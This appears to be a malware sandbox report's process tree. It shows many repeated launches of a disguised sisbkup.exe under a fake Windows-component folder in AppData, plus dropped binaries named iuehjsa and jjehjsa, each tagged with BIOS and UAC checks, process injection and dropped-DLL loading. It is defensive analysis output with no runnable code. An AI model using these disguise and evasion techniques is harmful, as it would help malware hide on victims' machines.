C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2124

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:824

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3008

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3064

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2404

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2480

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3068

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2384

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:108

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2192

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2364

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:2580

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3044

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2628

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1260

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2468

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1724

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2952

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2604

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:824

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2936

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2248

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1200

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2620

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:3020

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2444

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2152

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3040

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2332

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3056

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2208

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2156

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2556

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2412

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2868

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1540

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2716

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2648

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2472

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2132

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2720

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1528

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1200

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2616

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2176

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2212

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1516

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1720

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2680

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:964

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2288

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:276

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2556

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2692

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2868

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2508

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2816

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2940

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2316

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:956

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2788

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1732

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2124

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2592

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:456

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2500

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:656

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1740

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2524

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2128

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2300

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2240

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2984

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2776

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2728

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2936

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:3004

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2620

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2080

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2336

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2304

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2260

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1516

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1720

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2284

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2204

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2044

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:2412

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2300

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2780

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
